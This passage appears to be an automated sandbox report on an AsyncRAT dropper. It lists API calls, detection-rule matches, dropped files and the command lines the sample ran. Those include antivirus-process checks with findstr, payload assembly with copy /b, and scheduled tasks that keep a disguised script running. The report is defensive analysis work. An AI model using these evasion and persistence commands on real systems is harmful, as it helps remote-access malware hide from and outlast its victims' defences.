Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004050CD
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EB4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 10_2_00EB4830
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00364830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 18_2_00364830
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EB4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 10_2_00EB4632
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00ECD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 10_2_00ECD164
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0037D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 18_2_0037D164

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: 01 00 00 00 (ProcessBreakOnTermination = 1: the injected RegAsm.exe marks itself a critical process, so terminating it bugchecks the host; clear the flag before killing the process during response)

System Summary

Source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.3.Dump.pif.151caa0.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.3.Dump.pif.151caa0.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js"
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E60E38 CloseHandle,NtResumeThread, 10_2_00E60E38
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA42D5: CreateFileW,DeviceIoControl,CloseHandle, 10_2_00EA42D5
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E98F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 10_2_00E98F2E
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx, 0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 10_2_00EA5778
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00355778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 18_2_00355778
Source: C:\Users\user\Desktop\DA92phBHUS.exe File created: C:\Windows\BlogPs
Source: C:\Users\user\Desktop\DA92phBHUS.exe File created: C:\Windows\JamMerchant
Source: C:\Users\user\Desktop\DA92phBHUS.exe File created: C:\Windows\RespectiveSexual
Source: C:\Users\user\Desktop\DA92phBHUS.exe File created: C:\Windows\GeneticsFamiliar
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_0040497C 0_2_0040497C
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_00406ED2 0_2_00406ED2
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_004074BB 0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E4B020 10_2_00E4B020
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E494E0 10_2_00E494E0
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E49C80 10_2_00E49C80
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E623F5 10_2_00E623F5
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EC8400 10_2_00EC8400
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E76502 10_2_00E76502
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E4E6F0 10_2_00E4E6F0
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E7265E 10_2_00E7265E
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E6282A 10_2_00E6282A
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E789BF 10_2_00E789BF
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E76A74 10_2_00E76A74
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EC0A3A 10_2_00EC0A3A
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E50BE0 10_2_00E50BE0
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E9EDB2 10_2_00E9EDB2
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E6CD51 10_2_00E6CD51
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EC0EB7 10_2_00EC0EB7
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA8E44 10_2_00EA8E44
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E76FE6 10_2_00E76FE6
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E633B7 10_2_00E633B7
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E5D45D 10_2_00E5D45D
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E6F409 10_2_00E6F409
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E4F6A0 10_2_00E4F6A0
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E616B4 10_2_00E616B4
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E41663 10_2_00E41663
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E5F628 10_2_00E5F628
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E678C3 10_2_00E678C3
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E6DBA5 10_2_00E6DBA5
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E61BA8 10_2_00E61BA8
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E79CE5 10_2_00E79CE5
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E5DD28 10_2_00E5DD28
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E61FC0 10_2_00E61FC0
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E6BFD6 10_2_00E6BFD6
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_002FB020 18_2_002FB020
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_002F94E0 18_2_002F94E0
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_002F9C80 18_2_002F9C80
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_003123F5 18_2_003123F5
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00378400 18_2_00378400
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00326502 18_2_00326502
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0032265E 18_2_0032265E
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_002FE6F0 18_2_002FE6F0
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0031282A 18_2_0031282A
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_003289BF 18_2_003289BF
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00370A3A 18_2_00370A3A
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00326A74 18_2_00326A74
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00300BE0 18_2_00300BE0
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0031CD51 18_2_0031CD51
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0034EDB2 18_2_0034EDB2
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00358E44 18_2_00358E44
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00370EB7 18_2_00370EB7
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00326FE6 18_2_00326FE6
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_002F32C0 18_2_002F32C0
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_003133B7 18_2_003133B7
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0031F409 18_2_0031F409
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0030D45D 18_2_0030D45D
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0030F628 18_2_0030F628
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_002F1663 18_2_002F1663
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_003116B4 18_2_003116B4
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_002FF6A0 18_2_002FF6A0
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_003178C3 18_2_003178C3
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0031DBA5 18_2_0031DBA5
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00311BA8 18_2_00311BA8
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00329CE5 18_2_00329CE5
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_002F7CC9 18_2_002F7CC9
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0030DD28 18_2_0030DD28
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0031BFD6 18_2_0031BFD6
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00311FC0 18_2_00311FC0
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\438799\Dump.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: String function: 00301A36 appears 34 times
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: String function: 00318B30 appears 42 times
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: String function: 00310D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: String function: 00E51A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: String function: 00E60D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: String function: 00E68B30 appears 42 times
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: String function: 004062A3 appears 58 times
Source: DA92phBHUS.exe, 00000000.00000002.1782767831.00000000007CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs DA92phBHUS.exe
Source: DA92phBHUS.exe, 00000000.00000003.1722661916.00000000028EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs DA92phBHUS.exe
Source: DA92phBHUS.exe, 00000000.00000003.1778251668.00000000007CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs DA92phBHUS.exe
Source: DA92phBHUS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.3.Dump.pif.151caa0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.3.Dump.pif.151caa0.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@35/13@3/2
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EAA6AD GetLastError,FormatMessageW, 10_2_00EAA6AD
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E98DE9 AdjustTokenPrivileges,CloseHandle, 10_2_00E98DE9
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E99399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 10_2_00E99399
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00348DE9 AdjustTokenPrivileges,CloseHandle, 18_2_00348DE9
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00349399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 18_2_00349399
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 10_2_00EA4148
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_004024FB CoCreateInstance, 0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 10_2_00EA443D
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif File created: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:732:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\Kmswbx3MNQibZuVT
Source: C:\Users\user\Desktop\DA92phBHUS.exe File created: C:\Users\user\AppData\Local\Temp\nsdFDD7.tmp
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat
Source: DA92phBHUS.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\DA92phBHUS.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\DA92phBHUS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: DA92phBHUS.exe ReversingLabs: Detection: 18%
Source: C:\Users\user\Desktop\DA92phBHUS.exe File read: C:\Users\user\Desktop\DA92phBHUS.exe
Source: unknown Process created: C:\Users\user\Desktop\DA92phBHUS.exe "C:\Users\user\Desktop\DA92phBHUS.exe"
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 438799
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "pantyhoseyourslandscapesdisposition" Flyer
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Turn + ..\Tale + ..\Intensity L
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Dump.pif L
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "ImageSyncProX" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr" "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\m"
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Process created: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: shfolder.dll
